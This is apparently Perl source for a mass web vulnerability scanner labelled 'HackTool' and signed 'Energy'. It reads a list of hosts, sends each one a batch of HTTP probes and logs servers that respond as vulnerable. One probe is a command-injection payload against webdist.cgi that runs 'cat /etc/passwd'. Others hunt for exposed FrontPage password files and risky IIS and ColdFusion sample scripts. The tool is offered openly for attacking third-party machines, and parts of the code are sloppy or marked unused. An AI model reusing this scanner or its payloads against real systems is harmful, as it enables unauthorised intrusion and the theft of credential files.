HackTool. Perl. Energy. a - Source Code

1.  
2.  
3. @scripts_w = ("GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0\n\n",
4. "GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
5. "GET /article.php HTTP/1.0\n\n",
6. "GET /_vti_bin/shtml.exe HTTP/1.0\n\n",
7. "GET /msadc/samples/adctest.asp HTTP/1.0\n\n");
8.  
9. @names_w = ("/cgi-bin",
10. "/_vti_bin",
11. "/article",
12. "/_vti_bin",
13. "/Webdist",
14. "/msadc.pl",
15. "/RDS");
16.  
17.  
18. ######### Fast Scan - script must be edited in sub version if it is to be used ##########
19. @scripts_u = ("GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
20. "GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
21. "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
22. "GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
23. "GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
24. "GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
25. "GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
26. "GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
27. "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
28. "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
29. "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
30. "GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");
31. @names_u = ("_vti_inf.html   ","service.pwd     ","users.pwd       ","authors.pwd     ","administrators  ",
32. "shtml.dll       ","shtml.exe       ","args.bat        ","uploader.exe    ","rguest.exe      ",
33. "wguest.exe      ","bdir - samples  ","CGImail.exe     ","newdsn.exe      ","fpcount.exe     ",
34. "openfile.cfm    ","exprcalc.cfm    ","dispopenedfile  ","sendmail.cfm    ","codebrws.asp    ",
35. "codebrws.asp 2  ","showcode.asp    ","search97.vts    ","carbo.dll       ");
36. ############################# Above code not used ###########################################
37.  
38.  
39. ###############################################################
40.  $insecure = 0;
41. system "clear";
42. print "\n                Energy PHP Fast Scanner \n\n";
43. use IO::Socket;
44. my ($port, $sock,$server);
45. $size=0;
46. ################################ SCAN ##########################
47. if(! $ARGV[0])
48. {
49.  &usage;
50.  exit;
51. }
52.  
53. $port = $ARGV[2];
54. if(! $ARGV[2]) { $port = 80; }
55.  
56. open (HOSTFILE, "$ARGV[0]");
57. @hostfile = <HOSTFILE>;
58. chop(@hostfile);
59. $hostlength = @hostfile;
60. $hostcount = 0;
61.  
62. while ($hostcount < $hostlength) {
63.         print ("working on @hostfile[$hostcount]...\n");
64. $server = (@hostfile[$hostcount]);
65.         &connect;
66.         $hostcount++;
67.          }
68.  
69.  
70. print "Scanner dropper \n";
71.  
72. ##########################################################
73. sub connect {
74.         #print "[Trying $server]\n";
75.     $sock = IO::Socket::INET->new(PeerAddr => $server,
76.                     PeerPort => $port,
77.                     Proto => 'tcp');
78.     if ($sock)  {
79.         print "[Connected to $server on $port]\n";
80.             $n=0;
81.             &version;
82.         close(sock);
83.           $size++;
84.       } else {
85.    
86.     }
87. }
88.  
89. ###########################################################
90. sub version {
91.  $ver = "HEAD / HTTP/1.0\n\n";
92.   my($iaddr,$paddr,$proto);
93. $iaddr = inet_aton($server) || die "Error: $!";
94. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
95. $proto = getprotobyname('tcp') || die "Error: $!";
96. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
97. connect(SOCK, $paddr) || die "Error: $!";
98. send(SOCK, $ver, 0) || die "Can't to send packet: $!";
99.  
100. # I do believe this should be taken out-------------------------
101. # However unhash below to activate interactive optional deep mode.
102.  
103. # print "[Server version is]:\n[##############################]\n";
104. # while(<SOCK>)
105. # {
106. # print;
107. # }
108. # print "[##############################]\n";
109. #  print "Would you like normal or deep scan?\n [Normal-1, Deep-2, or Quit-3]:";
110. # $n=0;
111. # chomp($type=<STDIN>);
112.  
113. # Note if above is unhashed these two lines must be hashed.
114. $n=0;
115. $type=1;
116.  
117.  
118. if($type eq 3)
119.  { print "Scan aborted!\n"; exit; }
120.  if($type eq 1)
121.   {
122.   foreach $scripts_w(@scripts_w)
123. {
124.     print "Searching for @names_w[$n] : ";
125.     $scw=$scripts_w;
126.       $name = @names_w[$n];
127.     &win_scan;
128.     $n++;
129. }  
130.   }
131.  else {
132.  
133.  
134. foreach $scripts_u(@scripts_u)
135. {
136.     print "Searching for [@names_u[$n]] : ";
137.     $sc=$scripts_u;
138.       $name = @names_u[$n];
139.     &win2_scan;
140.     $n++;
141. }
142.   }
143. close(SOCK);
144. }
145. #################################################################
146. sub win_scan {
147. my($iaddr,$paddr,$proto);
148. $iaddr = inet_aton($server) || die "Error: $!";
149. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
150. $proto = getprotobyname('tcp') || die "Error: $!";
151. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
152. connect(SOCK, $paddr) || &error("Unable to connect: $!");
153. send(SOCK,$scw,0);
154.  
155.     $check=<SOCK>;
156.     ($http,$code,$blah) = split(/ /,$check);
157.     if($code == 200)
158.     {
159.        
160.                 print "[Found!]\n";
161.         open (OUT, ">>$ARGV[1]");
162.                 print OUT ("$server - [@names_w[$n]] \n");
163.                 close (OUT);
164.                 $insecure++;
165.     }
166.     else
167.     {
168.         print "[Not Found]\n";
169.  
170.     }
171.     close(SOCK);
172. }
173.  
174. ###############################################################
175. sub win2_scan {
176.  
177.  my($iaddr,$paddr,$proto);
178. $iaddr = inet_aton($server) || die "Error: $!";
179. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
180. $proto = getprotobyname('tcp') || die "Error: $!";
181. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
182. connect(SOCK, $paddr) || &error("Unable to connect: $!");
183. send(SOCK,$sc,0);
184.  
185.     $check=<SOCK>;
186.     ($http,$code,$blah) = split(/ /,$check);
187.     if($code == 200)
188.     {
189.         print "[Found!]\n";
190.         $insecure++;
191.     }
192.     else
193.     {
194.         print "[Not Found]\n";
195.  
196.     }
197.     close(SOCK);
198. }
199.  
200. ################################ USAGE ##########################
201. sub usage {
202.         system "clear";
203.         print "\n\n\n          Fast Scanner   \n\n";
204.        print "                   || by Energy ||  \n\n";
205.         print "Used to mass scan Windows,IRIX and Linux b0x\n\n";
206.     print "Usage: perl usdl.pl hostlist.txt logfile.txt [porta]\n\n";
207.     exit(0); }
208. ################################ END   ##########################
209. print "[Test $size hosts $port e $insecure sites vulnerable]\n";
210.